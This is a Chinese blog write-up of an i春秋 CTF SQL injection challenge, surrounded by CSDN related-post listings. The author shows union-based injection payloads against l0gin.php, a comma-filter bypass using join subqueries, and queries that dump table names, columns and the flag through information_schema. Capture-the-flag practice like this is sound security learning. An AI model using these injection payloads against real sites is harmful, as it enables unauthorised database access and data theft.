i春秋之SQLi--“百度杯”CTF比赛 九月场

已于 2022-04-04 19:13:02 修改
阅读量917 收藏 1
点赞数
分类专栏: CTFのWriteUp 文章标签: CTF i春秋
于 2022-04-04 19:12:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/123958132
版权

打开连接

 发现网页重定向了,用火狐按F12,浏览一下起始页面index.php

发现有提示,l0gin.php?id=1,不多废话进去看看

果然有东西,先看一下字段,构建payload

l0gin.php?id=1' order by 1--+

显示不正常,换了好多个闭合号,试了许多遍都是一样,发现好像是注释符出现了问题,把原有的--+换成了-- -

这下终于正常了,当order by 3的时候页面就不正常,由此可见字段数为2,接着用联合查询,构建payload

l0gin.php?id=1' union select 1,2-- -

 啊这,又不正常了,试了许多遍,发现逗号被过滤掉了,直接去看别人的WP,发现

union select 1,2

可以替换成

union select * from (select 1) a join (select 2) b

接着我们构建payload试试看

看见回显了,接着爆表,构建payload

l0gin.php?id=-1' union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema = database()) b-- -

 

 继续爆字段,构建payload

l0gin.php?id=-1' union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name = 'users') b-- -

 明显哪里有flag个,接着爆一下字段内容,构建payload

l0gin.php?id=-1' union select * from (select 1) a join (select group_concat(flag_9c861b688330) from users) b-- -

 拿到flag

金 帛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 308
个人CTF学习之路
【SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3403
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
i春秋之SQL(详细WP)
金 帛的博客
02-22 1495
i春秋webWP
“百度杯”CTF比赛 九月场 Code
feng的博客
09-11 566
前言 这道题基本上花了我差不多快5个小时,前面虽然遇到了小问题,但是自己也是努力攻克掉了,只是卡在了最后那块,看了很多WP,逻辑上花了很久很久才想明白。可以说,这题还是很不错的。 WP 打开环境发现是一张照片,第一反应是保存到本地然后用记事本打开看看里面藏没藏flag,我也这样试了,没用。我又进行了抓包和dirsearch扫描,其中dirsearch扫描有了一些收获: 我们发现了config.php文件,还有.idea的相关文件。我虽然不知道这是个什么文件,但是把那些都给打开看了一遍。在看/.idea/w
i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1499
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
SQLi-CTF-master.zip
04-09
SQLi-CTF-master
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
青少年CTF平台---sqli-labs
t235336456的博客
11-30 412
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
CTFhub-sqli注入-报错注入
ssss39的博客
08-24 1345
group_concat(目标值)
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4492
以pikachu靶场练习来学习ctf知识
CTFer成长之路之CTF中的SQL注入
众生度尽,方证菩提
02-20 1411
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1251
BUUCTF记录贴
i春秋SQLi
weixin_30701575的博客
09-04 236
打开题目网页是个很简单的登录网页 先查看源码,抓包 都没找到可用的信息 依我所见这里应该就是一个注入 但是怎么输入都会回显username错误 直到输入admin 尝试admin# Admin’# username错误。。。 尝试万能密码。。。。。失败 先用bp去测试过滤的符号发现%会出现不一样的情况(刚学会的方法) (测试方法 抓包 ...
Web-SQLi[i春秋][200pt]
Laurel_60的博客
08-04 1340
打开网址,是个登陆界面。 根据题目,第一反应–怕不是sql注入哦!经过尝试之后会发现,username=admin时,返回的是password error。ok,日常抓包,然后用intruder看看有没有字符被过滤掉。 事实证明,这个%有着大大的问题。拜读了网上的各种wp之后,原来是spintf()函数格式化字符串,导致了单引号逃逸。通过构造- - username=admin%1$\'...
暑期练习web22:sqli (i春秋) sql盲注,逗号绕过
qq_41618162的博客
08-23 1084
这道题一打开就是个白板,开始还以为网不好还没加载出来。。。查看源码 看到了login.php这个路径,于是满怀欣喜的访问它 结果进去后什么都没得。。。以前也遇到过这种情况,所以拿bp抓一下包,也没发现东西 这下就一筹莫展了,于是参考了一下wp,才知道发生了302重定向,简单说就是从一个跳转到另一个页面,而且这个过程是我们刚进入题目连接就发生了的 这里一个是1 另一个是l,很容易混淆...
i春秋 WEB SQL
A_dmin的博客
06-20 839
i春秋 WEB SQL 一天一道CTF题目,能多不能少 打开网页,发现有个id参数,而且有提示: 查看网页源代码,发现有sql语句显示: 直接抓包,发现and,or,order好像被过滤了, 使用/**/,发现还是不行: 经过尝试发现,可以使用<>绕过关键字过滤 经过尝试,得到有三个字段: 使用union查询,发现select也被过滤掉了,同理使用<> 发现2的位置...
bugku ctf sqli-0x1题解
最新发布
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值